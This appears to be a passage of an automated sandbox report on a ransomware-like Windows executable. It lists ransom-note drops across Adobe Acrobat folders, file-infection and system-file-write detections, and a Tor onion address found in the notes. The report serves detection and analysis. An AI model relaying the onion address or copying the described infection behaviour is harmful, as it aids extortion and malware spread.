Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior

Source: 2b7cu0KwZl.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe			Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe			Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Adobe\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093411-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\	Jump to behavior

Networking

Found Tor onion address

Source: RECOVERY INFO.txt62.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt283.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt37.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt10.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt196.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt304.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt153.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt89.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt257.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt155.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt56.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt52.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt275.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
